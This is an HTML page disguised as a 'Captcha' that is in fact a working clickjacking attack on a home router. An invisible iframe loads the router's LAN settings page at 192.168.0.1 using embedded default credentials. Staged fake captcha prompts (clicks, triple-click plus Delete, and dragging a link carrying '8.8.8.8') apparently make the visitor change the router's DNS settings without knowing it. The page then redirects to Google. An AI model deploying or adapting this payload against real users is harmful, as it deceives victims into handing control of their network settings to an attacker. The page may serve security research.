<html>
<head>
<script>
var btn1="<button class='btn2' id='btn2' type='submit' onclick='secondClick()' "+
	"style='position: absolute; left: 1010px; top: 475px;' >.</button>";
var btn2="<button class='btn3' id='btn3' type='submit' onclick='thirdClick()' "+
	"style='position: absolute; left: 650px; top: 740px;' >.</button>";
var btn3='<a href="#" style="position: absolute; left: 50px; top: 200px;" '+
	'id="drag1" draggable="true" ondragstart="drag(event)">Drag Me!</a>';
var btn4="<button class='btn4' id='btn4' type='submit' ondragover='fourthClick();' "+
	"style='position: absolute; left: 740px; top: 740px;' >.</button>";
var btn5="<button class='btn3' id='btn3' type='submit' onclick='fifthClick()' "+
	"style='position: absolute; left: 650px; top: 740px;' >.</button>";
var btn6='<button class="btn5" id="btn5" type="submit" '+
	'style="position: absolute; left: 940px; top: 840px;" >Continue</button>';
var btn7="<button class='btn1' id='btn1' type='submit' onclick='firstClick()' "+
	"style='position: absolute; left: 630px; top: 740px;' >.</button>";

function drag(ev) {ev.dataTransfer.setData("text", "8.8.8.8");}

function firstClick()	{
	document.getElementById("btn1").outerHTML = "";
	setTimeout(function() {
		document.getElementById("outerabove").innerHTML = btn1;
		document.getElementById("header").innerHTML =
			"Please double click the green button";
	},500);	
}
function secondClick()	{ 
	document.getElementById("btn2").outerHTML = "";
	setTimeout(function() {
		document.getElementById("outerabove").innerHTML = btn2;
		document.getElementById("header").innerHTML = 
			"Click 3 times on the green button and click Delete";
	},500);
}
function thirdClick()	{ 
	document.getElementById("btn3").outerHTML = "";
	setTimeout(function() {
		document.getElementById("outerabove").innerHTML = btn3;
		document.getElementById("outerabove").innerHTML += btn4;
		document.getElementById("header").innerHTML = 
			"Drag the blue box into the green box";
	},3000);
}
function fourthClick()	{
	document.getElementById("btn4").outerHTML = "";
	setTimeout(function() {
		document.getElementById("drag1").outerHTML = "";
		document.getElementById("outerabove").innerHTML = btn5;
		document.getElementById("header").innerHTML = 
			"Double click the green box";
	},3000);
}
function fifthClick()	{
	document.getElementById("btn3").outerHTML = "";
	setTimeout(function() {
		document.getElementById("outerbelow").innerHTML = btn6;
		document.getElementById("header").innerHTML = "Click continue!";
		setTimeout(function()	{
			location.href = "https://www.google.com";
		}, 60000);
	},1000);
}
function firstSetup()	{
	document.getElementById("outerabove").innerHTML = btn7;
	document.getElementById("header").innerHTML = 
		"Please double click the green button";
}

</script>
<style>
.btn1, .btn2, .btn3, .btn4, .btn5 {
	background-color:#44c767;
	-moz-border-radius:19px;
	-webkit-border-radius:19px;
	border-radius:19px;
	border:1px solid #18ab29;
	display:inline-block;
	cursor:pointer;
	font-family:Arial;
	font-size:12px;
	text-decoration:none;
	text-shadow:0px 1px 0px #2f6627;
}
.btn1, .btn3, .btn4 {
	padding:3px 31px;
	color:#44c767;
}
.btn2 {
	padding:3px 10px;
	color:#44c767;
}
.btn5 {
	padding:2px 2px;
	color:#ffffff;
}

.btn1:hover, .btn2:hover {
	background-color:#5cbf2a;
}
.btn1:active, .btn2:active {
	position:relative;
	top:1px;
}
a:link, a:visited {
    background-color: #f44336;
    color: white;
    padding: 1px 5px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
}
a:hover, a:active {
    background-color: red;
}
</style>
<title>Captcha</title>
   </head>
   <body onload="firstSetup()">
   <h1>Captcha</h1>
	 <h2 id="header" style="position: absolute; left: 10px; top: 120px;"> </h2>
	 <div id="outerbelow">
	 </div>
	 <div style="position: absolute; left: 10px; top: 120px;">
     	<iframe style="opacity: 0.0;"
			src="http://home:home@192.168.0.1/BasicLAN.asp"
			width="1200" height="800" scrolling="no" >
		</iframe>
	 </div>
	 <div id="outerabove">
	 </div>
   </body>
</html>
